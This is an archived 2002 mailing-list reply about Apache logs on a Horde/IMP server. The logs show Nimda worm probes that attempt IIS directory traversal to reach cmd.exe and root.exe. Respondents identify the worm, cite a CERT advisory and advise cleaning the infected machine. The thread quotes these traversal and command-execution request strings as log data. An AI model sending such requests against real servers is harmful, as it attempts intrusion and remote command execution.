R: [imp] Apache errors regarding IMP

Devin Drown drown@banzai.org
Mon Oct 21 14:33:10 2002
Previous message: R: [imp] Apache errors regarding IMP
Next message: [imp] Apache errors regarding IMP
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
The question I have is "202.64.220.x" the IP of your machine?  Because if it 
is, then these nimda requests are coming from it and you should really patch 
and clean your machine.

-Devin

Quoting Giovanni Riganti <griganti@eco.uninsubria.it>:

> Hi,
> 
> it is the usual procedure of nimda that tries to infect your machine
> Don't worry, nimda infect only IIS
> 
> Look http://www.cert.org/advisories/CA-2001-26.html.
> Or
> 
> Bye,
> Gio
> 
> 
> 
> 
> :> -----Messaggio originale-----
> :> Da: imp-bounces@lists.horde.org [mailto:imp-bounces@lists.horde.org]Per
> :> conto di Frederick Ho
> :> Inviato: lunedì 21 ottobre 2002 15:02
> :> A: imp@lists.horde.org
> :> Oggetto: [imp] Apache errors regarding IMP
> :>
> :>
> :> Hi,
> :>   I am currently running Horde 2.1, IMP 3.1 in RedHat 7.2 with Apache
> 1.3.23
> :> and logged some weird messages in the Apache logs.
> :>
> :>   Has anyone see the following errors in the Linux
> :> httpd/access_log, httpd/error_log regarding the Horde/IMP errors?
> :>
> :> > httpd/access_log
> :> 202.64.220.x - - [20/Oct/2002:21:16:28 +0800] "GET
> :> /horde/imp/view.php?thismailbox=INBOX&index=1941&id=2&actionID=11
> :> 3&mime=9d1caf7ffd290b8e7ebeecded7496350 HTTP/1.1" 200 5894947
> :> 202.64.220.x - - [20/Oct/2002:21:17:09 +0800] "GET
> :> /scripts/root.exe?/c+dir HTTP/1.1" 404 295
> :> 202.64.220.x - - [20/Oct/2002:21:17:09 +0800] "GET
> :> /MSADC/root.exe?/c+dir HTTP/1.1" 404 293
> :> 202.64.220.x - - [20/Oct/2002:21:17:10 +0800] "GET
> :> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.1" 404 303
> :> 202.64.220.x - - [20/Oct/2002:21:17:10 +0800] "GET
> :> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.1" 404 303
> :> 202.64.220.x - - [20/Oct/2002:21:17:13 +0800] "GET
> :> /scripts/..%5C../winnt/system32/cmd.exe?/c+dir HTTP/1.1" 404 315
> :> 202.64.220.x - - [20/Oct/2002:21:17:13 +0800] "GET
> :> /_vti_bin/..%5C../..%5C../..%5C../winnt/system32/cmd.exe?/c+dir
> :> HTTP/1.1" 404 328
> :> 202.64.220.x - - [20/Oct/2002:21:17:14 +0800] "GET
> :> /_mem_bin/..%5C../..%5C../..%5C../winnt/system32/cmd.exe?/c+dir
> :> HTTP/1.1" 404 328
> :>
> :> > httpd/error_log
> :> [Sun Oct 20 04:18:46 2002] [error] [client 202.64.220.x] File
> :> does not exist: /var/www/html/horde/imp/scripts/root.exe
> :> [Sun Oct 20 04:18:46 2002] [error] [client 202.64.220.x] File
> :> does not exist: /var/www/html/horde/imp/MSADC/root.exe
> :> [Sun Oct 20 04:18:47 2002] [error] [client 202.64.220.x] File
> :> does not exist: /var/www/html/horde/imp/c/winnt/system32/cmd.exe
> :> [Sun Oct 20 04:18:47 2002] [error] [client 202.64.220.x] File
> :> does not exist: /var/www/html/horde/imp/d/winnt/system32/cmd.exe
> :> [Sun Oct 20 04:18:47 2002] [error] [client 202.64.220.x] File
> :> does not exist:
> :> /var/www/html/horde/imp/scripts/..\../winnt/system32/cmd.exe
> :> [Sun Oct 20 04:18:50 2002] [error] [client 202.64.220.x] File
> :> does not exist:
> :> /var/www/html/horde/imp/_vti_bin/..\../..\../..\../winnt/system32/cmd.exe
> :> [Sun Oct 20 04:18:52 2002] [error] [client 202.64.220.x] File
> :> does not exist:
> :> /var/www/html/horde/imp/_mem_bin/..\../..\../..\../winnt/system32/cmd.exe
> :> [Sun Oct 20 04:18:52 2002] [error] [client 202.64.220.x] File
> :> does not exist:
> :> /var/www/html/horde/imp/msadc/..\../..\../..\/..Á^\../..Á^\../..Á
> :> ^\../winnt/system32/cmd.exe
> :> [Sun Oct 20 04:18:52 2002] [error] [client 202.64.220.x] File
> :> does not exist:
> :> /var/www/html/horde/imp/scripts/..Á^\../winnt/system32/cmd.exe
> :>
> :> Why am I getting these errors? I used both Netscape 7 and IE 6
> :> browser on Win2K to access the IMP mail server running on Linux.
> :> I also used Apache 2.0.4 on Redhat 8 on my development system
> :> and it showed the same weird messages on the logs.
> :>
> :> Anyone care to comment? Why the IMP tried to access winnt stuff?
> :> Am I under attacks? My virus scan showed nothing.
> :>
> :> Regards,
> :> Fred
> :>
> :>
> :>
> :>
> :> --
> :> IMP mailing list
> :> Frequently Asked Questions: http://horde.org/faq/
> :> To unsubscribe, mail: imp-unsubscribe@lists.horde.org
> 
> 
> --
> IMP mailing list
> Frequently Asked Questions: http://horde.org/faq/
> To unsubscribe, mail: imp-unsubscribe@lists.horde.org
Previous message: R: [imp] Apache errors regarding IMP
Next message: [imp] Apache errors regarding IMP
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]